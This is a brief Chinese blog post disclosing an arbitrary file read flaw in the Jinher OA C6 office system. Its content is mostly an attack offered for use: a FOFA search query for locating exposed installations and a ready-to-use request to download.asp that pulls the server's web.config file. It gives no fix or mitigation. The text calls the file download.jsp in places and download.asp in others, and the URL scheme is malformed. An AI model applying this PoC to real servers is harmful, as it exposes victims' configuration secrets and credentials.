金和OA C6 download.jsp 任意文件读取漏洞

金和OA C6 download.jsp 任意文件读取漏洞

漏洞描述

金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息

漏洞影响

金和OA

FOFA

app="Jinher-OA"

 

 

 

 

漏洞产生文件为 download.asp

 

POC构造

 

http//:x.x.x.x/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

随后就下载一个Web.config文件

 

 

 

 

 

END!!!

posted @   我就去睡觉  阅读(1942)  评论(0编辑  收藏  举报
相关博文:
·  JEEWMS 本地文件包含漏洞-CNVD-2020-61972
·  ACTI-DVR 文件读取漏洞
·  万户OA download_ftp.jsp 任意文件下载漏洞
·  万户OA DownloadServlet 任意文件读取漏洞
·  任意文件读取与下载漏洞
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
AI IDE Trae